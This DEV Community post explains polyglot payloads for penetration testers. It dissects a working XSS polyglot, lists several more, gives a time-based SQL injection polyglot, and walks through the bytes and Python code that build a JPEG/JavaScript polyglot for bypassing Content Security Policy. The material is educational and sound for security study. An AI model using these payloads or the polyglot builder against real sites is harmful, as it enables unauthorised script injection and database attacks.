DEV Community

Grzegorz Piechnik

What are polyglots and how to use them as a pentester

It would take days, if not weeks, to cover every possible vulnerability scenario (for example, for XSS) with the known payloads one by one; the size of the attack-vector list in PortSwigger's XSS cheat sheet gives an idea of the scale. Polyglots are something of a "universal" payload: a single string assembled from several payloads so that it executes in many different contexts at once. Note, however, that polyglots are often ineffective against systems protected by a WAF. A WAF with properly prepared signatures will drop the request before it reaches the application, and a polyglot's dense mix of quotes, comment openers and tag closers stands out to such signatures.

Analysis of polyglots

To better understand how polyglots are built, let's analyze one of them (from 0xsobky's "Ultimate XSS Polyglot" write-up, linked in the sources).

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

Let's break the polyglot into its parts. The mixed case (jaVasCript, oNcliCk) is there for filters that match on lowercase keywords.

  • jaVasCript: - a label in ECMAScript; in an HTML attribute such as href, the javascript: URI scheme,
  • /*-/*`/*\`/*'/*"/**/ - a multi-line comment in ECMAScript; read from inside a string, template literal or comment, a sequence of literals that closes whatever is open (each quote type is tried in turn, and the /**/ at the end closes a comment that was already open),
  • (/* */oNcliCk=alert() ) - the execution zone, wrapped in invocation parentheses: after a closed string literal it is parsed as a call, and the argument (alert()) is evaluated before the engine finds that a string is not callable,
  • //%0D%0A%0d%0a// - a single-line comment in ECMAScript; once URL-decoded, a double CRLF that terminates the headers of an HTTP response,
  • </stYle/</titLe/</teXtarEa/</scRipt/--!> - a sequence that breaks out of style, title, textarea and script elements and out of an HTML comment,
  • \x3csVg/<sVg/oNloAd=alert()//>\x3e - an svg element with an onload handler; \x3c and \x3e are the JavaScript hex escapes for < and >, so the element also appears after the string is unescaped by JavaScript.

Some other interesting examples of polyglots are below.

javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//> 
javascript:"/*'//`//\"//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/&lt;i<frame */ onload=alert()//</script> 
 javascript:alert()//'/*`/*"/**/;alert()//%0D%0A-->'>"></title></textarea></style></noscript></noembed></template></select>&lt;svg/oNloAd=alert()&gt;<FRAME onload=alert()></script>\";alert()//<svg/oNloAd=alert()> 

SQLi (SQL injection) polyglots

Similar to JavaScript code, we can create polyglots for the SQL query language. As an example, consider the payload proposed by security researcher Mathias Karlsson. It works whether the injection point is numeric, single-quoted or double-quoted: whichever quote closes the open literal leaves an `or SLEEP(1)` clause live, and the rest of the payload is swallowed by the `/* ... */` comment or by the closing quote of the original query.

SLEEP(1) /*' or SLEEP(1) or'" or SLEEP(1) or "*/
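The following is an added example, not code from the post, from 0xsobky's write-up or from Mathias Karlsson's slides: a small Python scanner that strips string literals and comments from a snippet and shows what is left to execute once a payload lands in a given context. It serves both the XSS polyglot dissected under "Analysis of polyglots" (dropped into bare JavaScript, each of the three string-literal kinds and an open block comment) and Karlsson's SQL payload in the three quoting contexts it targets, with a naive `' OR SLEEP(1)-- ` for contrast. The server-side templates, the variable and table names and the choice of MySQL comment syntax are assumptions; the scanner knows nothing about HTML, regex literals or nested comments.

```python
"""Lexical-context check for the XSS and SQLi polyglots quoted above.

Added example (not from the post). The templates standing in for vulnerable
server-side code are assumed; the scanner only models strings and comments.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Syntax:
    quotes: str          # characters that open and close string literals
    block: tuple         # (open, close) delimiters of block comments
    line: tuple          # openers of line comments, which run to CR or LF
    escape: str = "\\"   # escape character inside strings ("" for none)


JS = Syntax(quotes="'\"`", block=("/*", "*/"), line=("//",))
MYSQL = Syntax(quotes="'\"", block=("/*", "*/"), line=("-- ", "#"))


def live_code(src, syntax):
    """Return the characters of src that sit outside every string and comment."""
    out, state, i = [], "code", 0
    while i < len(src):
        ch = src[i]
        if state == "code":
            opener = next((o for o in syntax.line if src.startswith(o, i)), None)
            if src.startswith(syntax.block[0], i):
                state, i = "block", i + len(syntax.block[0])
            elif opener is not None:
                state, i = "line", i + len(opener)
            elif ch in syntax.quotes:
                state, i = ch, i + 1      # state holds the quote that must close
            else:
                out.append(ch)
                i += 1
        elif state == "block":
            if src.startswith(syntax.block[1], i):
                state, i = "code", i + len(syntax.block[1])
            else:
                i += 1
        elif state == "line":
            if ch in "\r\n":
                state = "code"
            i += 1
        else:                             # inside a string literal
            if syntax.escape and ch == syntax.escape:
                i += 2                    # skip the escaped character
            else:
                if ch == state:
                    state = "code"
                i += 1
    return "".join(out)


def survives(payload, contexts, syntax, marker):
    """Map each context name to whether `marker` reaches live code there."""
    return {name: marker in live_code(pre + payload + post, syntax)
            for name, pre, post in contexts}


# The XSS polyglot analysed above, and assumed JavaScript contexts to drop it in.
XSS_POLYGLOT = ("jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )"
                "//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>"
                "\\x3csVg/<sVg/oNloAd=alert()//>\\x3e")
JS_CONTEXTS = [
    ("bare script",          "",          ""),
    ("single-quoted string", "var v = '", "';"),
    ("double-quoted string", 'var v = "', '";'),
    ("template literal",     "var v = `", "`;"),
    ("block comment",        "/* ",       " */"),
]

# Karlsson's SQLi polyglot, a naive payload for contrast, and assumed query templates.
SQL_POLYGLOT = "SLEEP(1) /*' or SLEEP(1) or'\" or SLEEP(1) or \"*/"
SQL_NAIVE = "' OR SLEEP(1)-- "
SQL_CONTEXTS = [
    ("numeric",       "SELECT * FROM users WHERE id = ",    ""),
    ("single-quoted", "SELECT * FROM users WHERE name = '", "'"),
    ("double-quoted", 'SELECT * FROM users WHERE name = "', '"'),
]

if __name__ == "__main__":
    for name, pre, post in JS_CONTEXTS:
        print(f"JS  {name:21}  {live_code(pre + XSS_POLYGLOT + post, JS)!r}")
    for label, payload in (("polyglot", SQL_POLYGLOT), ("naive", SQL_NAIVE)):
        print(label, survives(payload, SQL_CONTEXTS, MYSQL, "SLEEP(1)"))
```

Every JavaScript context leaves `(oNcliCk=alert() )` as the surviving code, and the SQL polyglot leaves `SLEEP(1)` live in all three query shapes while the naive payload survives only the single-quoted one. A `//` line-comment context is not included on purpose: the polyglot only escapes it once the server URL-decodes `%0D%0A` into a real line break, and this scanner is run on the raw string.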

JavaScript/JPEG polyglots

So far we have analyzed XSS polyglots and SQL ones. It is also possible to build a file that is at the same time a valid JPEG and valid JavaScript. Such a file can bypass a Content Security Policy on a site that hosts user-submitted images on an origin its script-src allows: the "image" is loaded with a script tag and executes. The challenge of creating such a polyglot was taken up by researcher Gareth Heyes, who describes the entire process in his article (linked in the sources).

In short, the file must parse as a JPEG for an image decoder and as JavaScript for a script engine. This is possible because the two formats are not mutually exclusive: a JPEG decoder walks marker segments and ignores the bytes inside a comment segment, while JavaScript ignores everything inside /* */ comments, so each side's data can be hidden in the other's comment.

The file starts with the JPEG SOI marker and the APP0 (JFIF) marker, 0xFF 0xD8 0xFF 0xE0. Decoded as text, these four bytes are the characters ÿØÿà, a valid JavaScript identifier, so the script begins with a variable name. The next two bytes are the APP0 segment length, which Heyes set to 0x2F 0x2A: as text this is /*, the start of a multi-line JavaScript comment. That length (12074 bytes) is far larger than a normal JFIF header, so the segment is padded with zero bytes up to that size; all of them sit inside the comment.

FF D8 FF E0 2F 2A 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 00 00 00 00 00 00 00 00....

The JPEG comment segment starts with the marker 0xFF 0xFE followed by its length, 0x00 0x1C (28 bytes, including the two length bytes themselves). Its body is the JavaScript payload */=alert("Burp rocks.");/*: the */ closes the comment opened by the APP0 length, the alert call executes, and /* opens a new comment that swallows the rest of the image data.

FF FE 00 1C 2A 2F 3D 61 6C 65 72 74 28 22 42 75 72 70 20 72 6F 63 6B 73 2E 22 29 3B 2F 2A

Then the JavaScript comment has to be closed at the end of the file. In the described case, the four bytes immediately before the EOI marker (0xFF 0xD9) were edited to *///: */ closes the comment and // turns the EOI marker into a line comment. Here is what the end of the file looks like:

2A 2F 2F 2F FF D9

The output of the standard file and hd -C commands shows the layout: the COM marker (ff fe) lands at offset 0x2f2e, which is 4 + 12074, immediately after the padded APP0 segment, and the ff db right after the payload is the DQT (quantization table) marker of the original image.

$ file xss.jpg
xss.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 12074, comment: "*/=alert("Burp rocks.");/*", baseline, precision 8, 450x68, components 3

$ hd -C xss.jpg
00000000  ff d8 ff e0 2f 2a 4a 46  49 46 00 01 01 01 00 48  |..../*JFIF.....H|
00000010  00 48 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |.H..............|
00000020  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00002f20  00 00 00 00 00 00 00 00  00 00 00 00 00 00 ff fe  |................|
00002f30  00 1c 2a 2f 3d 61 6c 65  72 74 28 22 42 75 72 70  |..*/=alert("Burp|
00002f40  20 72 6f 63 6b 73 2e 22  29 3b 2f 2a ff db 00 43  | rocks.");/*...C|
00002f50  00 03 02 02 03 02 02 03  03 03 03 04 03 03 04 05  |................|
00002f60  08 05 05 04 04 05 0a 07  07 06 08 0c 0a 0c 0c 0b  |................|
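To make the layout concrete, here is an added example in Python, not Gareth Heyes' code or the post's own, that assembles a file with exactly the header structure shown in the hexdump above and then checks it from both sides: a simplified JPEG segment walk and a JavaScript comment strip over the same bytes. The image body is a constructed stub (a DQT segment, an SOS header and a few bytes of fake scan data), so the result has a valid marker structure but is not a picture; the offsets, segment names and the ÿØÿà identifier follow from the bytes themselves. The `stray_closers` check is my addition for use on a real image: any `*/` in the entropy-coded data would close the JavaScript comment early.

```python
"""Build a JPEG/JavaScript polyglot with the layout described above and check both views.

Added example (not Gareth Heyes' code or the post's own). The image body is a
constructed stub; replace stub_image_segments() with a real image's segments
(everything after its APP0 segment) to get a file that also renders.
"""
import re
import struct

SOI, APP0, COM, DQT, SOS, EOI = 0xD8, 0xE0, 0xFE, 0xDB, 0xDA, 0xD9
NAMES = {APP0: "APP0", COM: "COM", DQT: "DQT", SOS: "SOS", EOI: "EOI"}
JS_PAYLOAD = b'*/=alert("Burp rocks.");/*'
APP0_LEN = 0x2F2A                  # 12074: the big-endian bytes 2F 2A spell "/*"


def segment(marker, body):
    """FF <marker> + 2-byte big-endian length (which counts itself) + body."""
    return bytes([0xFF, marker]) + struct.pack(">H", len(body) + 2) + body


def stub_image_segments():
    """Constructed stand-ins for a real image's DQT/SOS/scan data (not decodable)."""
    dqt = segment(DQT, b"\x00" + b"\x01" * 64)         # length 0x43, as in the hexdump
    sos = segment(SOS, b"\x01\x01\x00\x00\x3F\x00")     # one-component scan header
    return dqt + sos + bytes([0x12, 0x34, 0x56, 0x78])  # fake entropy-coded data


def build_polyglot(payload=JS_PAYLOAD, image_segments=None):
    if image_segments is None:
        image_segments = stub_image_segments()
    jfif = b"JFIF\x00\x01\x01\x01\x00\x48\x00\x48\x00\x00"
    # The APP0 segment must really be APP0_LEN bytes, so pad the JFIF body with NULs;
    # everything from here up to the COM payload sits inside the JS comment.
    app0 = bytes([0xFF, APP0]) + struct.pack(">H", APP0_LEN) + jfif.ljust(APP0_LEN - 2, b"\x00")
    com = segment(COM, payload)          # "*/" closes the comment, JS runs, "/*" reopens it
    tail = b"*///" + bytes([0xFF, EOI])  # "*/" closes it again, "//" comments out the EOI
    return bytes([0xFF, SOI]) + app0 + com + image_segments + tail


def walk_segments(data):
    """Simplified JPEG marker walk: [(marker, offset, length)], ending at EOI.
    Ignores RSTn/TEM markers and FF padding; after SOS it just scans for EOI."""
    if data[:2] != bytes([0xFF, SOI]):
        raise ValueError("missing SOI")
    segs, i = [], 2
    while i + 1 < len(data):
        if data[i] != 0xFF:
            raise ValueError(f"expected a marker at offset {i:#x}")
        marker = data[i + 1]
        if marker == EOI:
            return segs + [(marker, i, 0)]
        length = struct.unpack(">H", data[i + 2:i + 4])[0]
        segs.append((marker, i, length))
        i += 2 + length
        if marker == SOS:                # entropy-coded bytes follow; jump to EOI
            i = data.index(bytes([0xFF, EOI]), i)
    raise ValueError("no EOI marker")


# Comment stripper for the JS view. It ignores string literals, which is enough
# here because the only live code is the payload itself.
JS_COMMENT = re.compile(r"/\*.*?\*/|//[^\r\n]*", re.S)


def analyse(data):
    """Both views of the same bytes: JPEG segment list and the JavaScript that runs."""
    segs = walk_segments(data)
    com = next(s for s in segs if s[0] == COM)
    # One byte per character, as when the script is loaded with charset ISO-8859-1;
    # FF D8 FF E0 then decodes to the identifier ÿØÿà.
    text = data.decode("latin-1")
    return {
        "markers": [NAMES.get(m, f"{m:#04x}") for m, _, _ in segs],
        "com_offset": com[1],
        "com_text": data[com[1] + 4:com[1] + 2 + com[2]],
        "js": JS_COMMENT.sub("", text),
        # Any "*/" in the real image data (beyond the two placed on purpose) ends
        # the comment early and breaks the script: check this on a real image.
        "stray_closers": text.count("*/") - 2,
    }


if __name__ == "__main__":
    info = analyse(build_polyglot())
    print(info["markers"], hex(info["com_offset"]), info["com_text"])
    print("JS view:", info["js"])
```

The JS view of the file reduces to `ÿØÿà=alert("Burp rocks.");`, an assignment to a global named by the header bytes. Note that the `*///` tail only survives the JPEG walk because it lies inside the entropy-coded data after SOS, where the decoder is not looking for segment lengths; that is what allowed the bytes just before EOI to be edited in the first place. The JS view assumes a single-byte charset when the script is loaded; decoded as UTF-8, the header bytes would not form a valid identifier.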

polyglot.innerht.ml

polyglot.innerht.ml is a site (now only reachable through the Web Archive, see the sources) where users can submit their own polyglots. Some of them cover up to 20 contexts.

Sources

https://web.archive.org/web/20190617111911/https://polyglot.innerht.ml/
https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
https://portswigger.net/research/bypassing-csp-using-polyglot-jpegs
https://dev.to/caffiendkitten/xss-javascript-polyglots-4i64
https://www.slideshare.net/MathiasKarlsson2/polyglot-payloads-in-practice-by-avlidienbrunn-at-hackpra
